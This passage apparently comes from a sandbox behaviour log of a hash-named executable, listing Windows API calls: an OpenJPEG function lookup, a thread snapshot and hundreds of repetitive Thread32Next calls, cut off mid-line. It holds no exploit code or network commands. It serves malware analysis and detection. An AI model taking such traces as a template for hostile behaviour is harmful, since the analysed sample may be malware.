lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0141.573] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1000) returned 0x2d65030 [0141.574] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2c) returned 0x448410 [0141.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_codec_set_threads", cchWideChar=-1, lpMultiByteStr=0x448410, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_codec_set_threads", lpUsedDefaultChar=0x0) returned 22 [0141.575] GetLastError () returned 0x0 [0141.575] SetLastError (dwErrCode=0x0) [0141.575] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_codec_set_threadsW") returned 0x0 [0141.575] GetLastError () returned 0x7f [0141.575] SetLastError (dwErrCode=0x7f) [0141.575] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_codec_set_threadsA") returned 0x0 [0141.575] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_codec_set_threads") returned 0x7ffc45f19c10 [0141.575] GetActiveWindow () returned 0x0 [0141.576] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x430000) returned 1 [0141.576] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448410 | out: hHeap=0x430000) returned 1 [0141.576] GetCurrentProcessId () returned 0xcbc [0141.576] GetCurrentThreadId () returned 0xee0 [0141.576] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0141.584] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.602] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.602] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.603] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.603] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.604] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.605] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.605] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.893] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.893] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.387] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.388] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.390] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.391] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.402] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.405] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.407] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.411] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.411] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.413] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.825] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.829] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0142.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0143.318] Thread32Next (hSnapshot=0x17c, 